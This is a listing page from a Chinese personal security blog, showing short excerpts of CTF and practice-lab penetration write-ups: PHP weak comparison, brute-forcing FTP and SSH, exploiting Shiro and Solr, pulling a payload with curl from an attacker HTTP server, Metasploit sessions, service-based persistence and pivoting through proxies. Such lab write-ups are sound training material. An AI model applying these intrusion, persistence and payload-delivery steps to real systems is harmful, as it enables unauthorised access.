AU9U5T's blog
  • Home
  • Archives
  • Categories
  • Tags
  • About

php比较

[SWPUCTF 2022 新生赛]funny_web0x00 使用的知识点是php 的弱比较 0x01 发现是弱比较的话,可以参考 PHP强相等&弱相等(附带科学计数法)_强等于 弱等于-CSDN博客 可以使用科学计数法 就可以解出
2024-04-07
#CTF刷题记录

项目8

信息收集 使用nmap 判断找到ip 得到ip 192.168.79.179 端口信息收集 web 打点21尝试爆破ftp 没有结果 22爆破,没有结果 80cms 尝试web 路径爆破 并没有什么作用 根据提示绑定域名 C:\WINDOWS\system32\drivers\etc 打开hosts 添加这个 出现了一个神奇玩意儿 尝试爆破一下路径 尝试观看日志 发
2024-04-05
#靶场记录

bugku渗透测试一

场景一直接通过源码 搜索 场景二根据提示,我直接拼接了admin 成功跳转 弱口令进入 随便看看 场景三观察,发现并没有暴露的数据库信息 那就只有尝试连接主机看看,刚才看到执行代码的地方,试试 直接连接 然后找找 场景四 注意不能使用localhost
2024-04-04
#CTF刷题记录

vps环境搭建

docker 搭建 安装必要的系统工具 12sudo apt updatesudo apt -y install apt-transport-https ca-certificates curl software-properties-common 添加docker PGP key 1curl -fsSL https://download.docker.com/linux/debian/gpg
2024-04-04
#渗透

将普通程序注册成服务

简介由于在横向移动或者权限维持的过程中,有可能出现,需要使用windows 服务进行执行程序,然后由于windows 服务的机制,可能在运行的时候会出现断开连接的情况,这个时候我们就需要使用工具注册成服务的形式 exe现在展示一下无服务的形式 首先生成一个普通的Exe payload 开启一个msf 监听 使用sc 模拟上线 由于不是服务所以直接被关闭了 msf-服务现在尝试使用msf
2024-04-04
#渗透

外网靶场2

信息收集 cms 发现是若依 web 渗透 根据信息收集获取的数据,直接使用shiro 尝试 利群利用 发现存在直接反弹shell 上线msf 生成payload 开启http服务 使用curl 1curl http://ip:8000/file -O 执行 上线成功 内网信息收集 网段信息收集 fscan 一下 内网横向移动 搭建代理 成功 17
2024-03-19
#靶场记录

外网靶场1

信息收集做了一个简单的信息收集 8.2 的版本,并且可以创建core ,不能修改debug 模式 web 渗透 默默打开了佩奇文档 前面几个都失败了 直接利用这个 123456789101112131415POST /solr/test/config HTTP/1.1Host: { "update-queryresponsewriter": { &
2024-03-19
#靶场记录

提权

https://www.zhixi.com/view/5ca77153
2024-03-16
#整理

代理

代理socks分类反向代理代理服务器理解: 典型例子nginx 用于实现网站的负载均衡,安全防护音隐藏服务器的ip正向代理代理客户端理解: 可以参考clash 并不能代理google,而是通过代理自己从而访问google工具msf核心操作: 写路由,通过获取到的meterpreter 进行run autoroute -s ip段,类似于手动添加路由表 使用socks_proxy 模
2024-03-11
#整理

三层cfs

简介这个只是为了深刻记录代理原理,所以尝试再做一次。 并且全程只使用msf 的代理 重点就是,多个路由,一个代理通过这一个代理,就可以访问多层内网,但是必须在对应的metepreter 设置路由,可以直接为路由表,然后进行转发 信息收集 ip 查询 端口扫描 网站信息收集 访问 路径 找到一个flag? 查看版本 存在nginx web渗透 利用thinkphp 1/index
2024-03-03
#靶场记录
1…1011121314…35

Search

github 随笔
Views: Visitors: